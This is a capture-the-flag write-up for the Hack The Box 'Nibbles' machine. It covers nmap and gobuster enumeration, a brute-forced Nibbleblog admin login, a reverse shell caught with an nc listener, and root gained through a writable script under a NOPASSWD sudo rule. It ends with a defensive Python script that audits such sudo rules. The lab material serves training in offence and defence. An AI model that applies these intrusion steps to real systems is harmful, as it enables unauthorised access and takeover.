
Hack The Box : Nibbles

20 July, 2021

Beginning with an nmap scan:

# nmap -A -sC -sV -O 10.10.10.75
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-20 11:46 EDT
Nmap scan report for 10.10.10.75
Host is up (0.34s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/20%OT=22%CT=1%CU=37505%PV=Y%DS=2%DC=T%G=Y%TM=60F6F00
OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=103%TI=Z%CI=I%II=I%TS=8)OPS(
OS:O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11
OS:NW7%O6=M54BST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   301.34 ms 10.10.16.1
2   151.76 ms 10.10.10.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.63 seconds

Port 80 served a page with a helpful hint in an HTML comment:

# curl 10.10.10.75
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->

The path led to a Nibbleblog instance. I couldn't find any valuable information on the blog itself, so I ran gobuster on the path:

# ./gobuster dir -r -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.75/nibbleblog/ -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.75/nibbleblog/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2987]
/sitemap.php          (Status: 200) [Size: 401] 
/content              (Status: 200) [Size: 1353]
/themes               (Status: 200) [Size: 1741]
/feed.php             (Status: 200) [Size: 300] 
/admin                (Status: 200) [Size: 2127]
/admin.php            (Status: 200) [Size: 1401]
/plugins              (Status: 200) [Size: 3777]
/install.php          (Status: 200) [Size: 78]  
/update.php           (Status: 200) [Size: 1622]
/README               (Status: 200) [Size: 4628]
/languages            (Status: 200) [Size: 3167]

So there is an admin login page at admin.php... but I don't have any credentials yet.

The README indicated that the Nibbleblog version was 4.0.3:

# curl 10.10.10.75/nibbleblog/README
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com

I couldn't find any other information, so I focused on finding the admin credentials. Browsing the directories from the gobuster output, I found that the admin username is admin:

# curl http://10.10.10.75/nibbleblog/content/private/users.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users><user username="admin"><id type="integer">0</id>

I created a very small wordlist from the homepage using cewl and tried to brute-force the password; it turned out the admin password was nibbles.

Using this exploit guide, I was able to upload a reverse shell:

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.174] from (UNKNOWN) [10.10.10.75] 43538
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 12:46:55 up  1:44,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
$ whoami
nibbler

nibbler had the user flag in its home directory:

$ pwd
/
$ cd /home
$ ls
nibbler
$ cd nibbler
$ ls -ltrha
total 24K
drwxr-xr-x 3 root    root    4.0K Dec 10  2017 ..
drwxr-xr-x 3 nibbler nibbler 4.0K Dec 10  2017 personal
drwxrwxr-x 2 nibbler nibbler 4.0K Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1.9K Dec 10  2017 personal.zip
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
-r-------- 1 nibbler nibbler   33 Jul 20 11:03 user.txt
drwxr-xr-x 4 nibbler nibbler 4.0K Jul 20 12:01 .
$ cat user.txt
<flag>

Exploring around, sudo -l revealed a script that nibbler could run as root:

$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
$ cat ~/personal/stuff/monitor.sh
su
$ sudo /home/nibbler/personal/stuff/monitor.sh
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cd /root
ls -ltrha
total 32K
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwxr-xr-x  2 root root 4.0K Dec 10  2017 .nano
drwx------  2 root root 4.0K Dec 10  2017 .cache
-rw-------  1 root root    0 Dec 29  2017 .bash_history
-rw-------  1 root root 1.1K Dec 15  2020 .viminfo
drwx------  4 root root 4.0K Dec 15  2020 .
drwxr-xr-x 23 root root 4.0K Dec 15  2020 ..
-r--------  1 root root   33 Jul 20 11:03 root.txt
cat root.txt
<flag>
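The root step above hinges on a NOPASSWD rule that points at a script inside the user's own home directory, so the user can rewrite whatever runs as root. The following is an added example, not part of this writeup, of a small audit a defender can run to catch that pattern: it parses `sudo -l` output and flags every command whose file or any parent directory is writable by the invoking user. The sample `sudo -l` text and the `root` parameter (for walking a staged copy of the tree) are my own constructions.

```python
import grp
import os
import pwd
import re
import stat

# Constructed sample in the shape of the sudo -l output on the box (not captured from it).
SAMPLE_SUDO_L = """User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

# Matches rule lines such as "    (root) NOPASSWD: /path/to/cmd"; tags like SETENV: are tolerated.
SUDO_RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/\S+)")

def parse_sudo_l(output):
    """Return (runas, nopasswd, command) tuples; non-rule lines are ignored."""
    rules = []
    for line in output.splitlines():
        m = SUDO_RULE.match(line)
        if m:
            rules.append((m.group("runas"), "NOPASSWD:" in m.group("tags"), m.group("cmd")))
    return rules

def can_write(st, uid, gids):
    """Owner/group/other write check of a stat result for the given uid and group set."""
    if uid == 0:
        return True
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)

def user_ids(username):
    """uid and full group set of a local account, for auditing a real host."""
    pw = pwd.getpwnam(username)
    return pw.pw_uid, {pw.pw_gid} | {g.gr_gid for g in grp.getgrall() if username in g.gr_mem}

def audit_rules(sudo_output, uid, gids, root="/"):
    """Per rule, list each path component (script and every parent dir) the user can write.
    A writable parent is as bad as a writable script, since the file can simply be replaced."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(sudo_output):
        writable, cur = [], root
        for comp in cmd.lstrip("/").split("/"):
            cur = os.path.join(cur, comp)
            if not os.path.exists(cur):
                break  # nothing below exists; a writable parent is already recorded
            if can_write(os.stat(cur), uid, gids):
                writable.append("/" + os.path.relpath(cur, root))
        if writable:
            findings.append({"runas": runas, "nopasswd": nopasswd, "command": cmd, "writable": writable})
    return findings
```

On a live host, feed it the real output of `sudo -l -U <user>` together with `user_ids(<user>)`; any finding means the sudo rule grants more than it appears to.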